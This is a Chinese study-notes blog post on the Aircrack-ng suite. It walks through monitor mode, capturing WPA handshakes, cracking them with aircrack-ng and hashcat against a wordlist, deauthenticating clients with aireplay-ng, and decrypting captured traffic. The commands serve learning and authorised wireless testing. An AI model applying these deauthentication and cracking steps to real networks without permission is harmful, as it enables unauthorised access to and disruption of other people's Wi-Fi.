首页 > 其他分享 >学习笔记-Aircrack

学习笔记-Aircrack

时间:2022-11-02 18:55:38浏览次数:97  
标签:wireless 802.11 笔记 ng 学习 AP 网卡 Aircrack aircrack

Aircrack


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


简介

aircrack 是一个比较出名的用于破解 WEP 和 WPA 加密的无线网络的一款工具,由 6 个不同的部分组成:

  1. aircrack-ng 用于破解 WEP 以及 WPA-PSK 密钥。一旦 aircrack-ng 工具收集了足够的信息,aircrack-ng 将会分析这些数据,并试图确定使用中的密钥。
  2. airdecap-ng 解读被破解的网络数据包
  3. airmon-ng 为使用整个 aircrack-ng 套件配置一个网卡
  4. aireplay-ng 在无线网络中产生可能在恢复中的 WEP 密钥所需的流量
  5. airodump-ng 捕获被 aircrack-ng 用于破解 WEP 密钥的 802.11 帧
  6. tools 为微调提供分类工具箱

相关文章


配置无线网卡

  • WM Ware(开机后)

    虚拟机->可移动设备->Ralink 802.11 n Wlan(显卡型号)->连接(断开与主机的连接)

  • VBox

    虚拟机关机状态下->将设备插入主机->设置->USB 设备->添加->删除除了供应商标识(VendorID)和产品标识(ProductID)之外的参数->开机->插入设备

  • 验证是否连接成功

    lsusb
    airmon-ng
    ifconfig
    iwconfig
    

    出现无线网卡型号即为成功

无线基础命令

iwlist      # 用于对 /proc/net/wireless 文件进行分析,得出无线网卡相关信息
    iwlist wlan0 scanning | grep "ESSID"    # 查看当前所有的 AP 名

iwconfig
    iwconfig wlan0 scanning                 # 扫描无线接入点
    iwconfig wlan0 nickname hacking         # 添加别名

例子

以无线网卡名为 wlan0 举例

airmon-ng start wlan0   # 启动网卡监听模式
airmon-ng check kill    # 关闭干扰程序

airodump-ng wlan0mon    # 开启抓包,获取附件无线网络
列名 含义
BSSID(Basic Service SetIdentifier) AP 的 MAC 地址
PWR(Power) 信号强度
Beacons AP 发出的通告编号, 每个接入点 (AP) 在最低速率 (1M) 时差不多每秒会发送 10 个左右的 beacon, 所以它们能在很远的地方就被发现
Data 当前数据传输量
/s 过去 10 秒钟内每秒捕获数据分组的数量
CH(Channel) AP 所在的频道
MB AP 的最大传输速度; MB=11 => 802.11b,MB=22 => 802.11b+, MB>22 => 802.11g; 后面带. 的表示短封包标头, 处理速度快, 更利于破解
ENC(Encryption) 使用的加密算法体系
CIPHER 检测到的加密算法
AUTH(Authority) 认证方式
ESSID(The Extended Service Set Identifier) AP 的名称
airodump-ng -c 6 --bssid E0:24:81:AF:F3:A8 -w wireless wlan0mon     # 指定特定的wifi抓握手包,出现 handshake 则抓包成功
# -c 指定信道,上面已经标记目标热点的信道(CH)
# -bssid 指定目标路由器的BSSID,就是上面标记的BSSID
# -w 指定抓取的数据包保存的目录

aircrack-ng -a2 -b E0:24:81:AF:F3:A8 -w pass.txt wireless-01.cap    # 跑包

使用 hashcat 爆破(只能跑 WPA/WPA2/PSK 加密的)

用 aircrack-ng 把 cap 转换成 hccap 类型数据包(会自动添加后缀名 .hccap)

aircrack-ng wireless-01.cap -J wireless
hashcat -m 2500 wireless.hccap pass.txt --force                     # 用hashcat破解WPA/PSK密码

若是提示"Old hccap format detected! You need to update"可以将第一步的命令改为

aircrack-ng wireless-01.cap -j wireless

Deauthentication

注意如果抓不到握手包把对方踢下线,这样就会抓包成功

aireplay-ng -0 10 -a <无线路由器的MAC地址> -c <连接上的设备MAC地址> wlan0mon
# -0 冲突攻击模式,后面跟发送次数,一般使用这个模式即可。
# -a 无线网 mac 地址
# -c 连接上的客户端 mac 地址,就是那个 STATION

流量解密

airdecap-ng -e [SSID name] -p [Wifi pass] xxx.cap

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

标签:wireless,802.11,笔记,ng,学习,AP,网卡,Aircrack,aircrack
From: https://www.cnblogs.com/haidragon/p/16852032.html

相关文章

  • Python学习路程——面向对象
    Python学习路程——面向对象编程思想'''面对过程编程: 过程即流程,面向过程就是按照固定的流程解决问题 需要列举出每一步的流程,并且随着步骤的深入,问题的解决也越来越......
  • 尚品汇笔记(前台-day2)
    犯的错误:1:项目阶段,左侧菜单目录,只能有项目文件夹2:联想电脑安装node_modules依赖包的时候,经常丢包。npminstall--saveaxios--force3:单词错误4:路由理解KV:K--->UR......
  • Stata笔记
    matlist与matlist的区别:matlistisanextensionofthematrixlistcommand。`matlist`有更多的控制选项,可以更多地改变矩阵的展示方式。`matlist`只能打印一个......
  • Mongodb修改oplog大小--笔记
    MongoDB3.6之前oplog修改需要重启实例到非副本单实例模式,3.6开始可以使用命令replSetResizeOplog在线修改副本集成员的oplog大小。修改方式为:先修改从secondary节点开,然后......
  • 软件技术基础学习笔记(2)——独立完成一个项目
    软件技术基础学习笔记(2)——独立完成一个项目这个作业属于哪个课程<首页-22软件基础-浙江理工大学-班级博客-博客园>这个作业的目标<在限定的期限内,完成......
  • Springcloud学习笔记51--@Configuration+@Bean实现自动化装配,解决第三方jar中类bean交
    1.@Configuration+@Bean编写配置类此时,第三方类为DataSource;/***@Authorlucky*@Date2022/4/19:18*配置数据库连接池,注入DataSource*/@Configurationpub......
  • 【已解决】Git踩坑笔记[! [remote rejected] main -> main (pre-receive hook decline
    踩坑今天使用gitlab踩坑了目的是要将代码上传到公司gitlab中,组长给我创建好了仓库,但是没有初始化仓库。我需要将本地代码上传上去,老操作,先在本地代码的目录打开gitbash,......
  • 算法学习笔记11.02
    第一章基础算法(三)双指针算法可以是两个指针分别指向两个序列,也可以是两个指针指向一个序列,维护一段区间核心思想:将O(n2)优化到O(n)最长连续不重复子序列最长的不......
  • Javaio流学习
    创建文件的三种方式:1.packageyjtest.demo;importjava.io.File;importjava.io.IOException;publicclasstestcreate{publicstaticvoidmain(String[]args)throws......
  • python-看代码YOLOv3学习
    file.readline():作为列表返回文件中的所有行,其中每一行都是列表对象中的一项.str.replace(old,new[,max])rstrip():删除string字符串末尾的指定字符,默认为空白符,......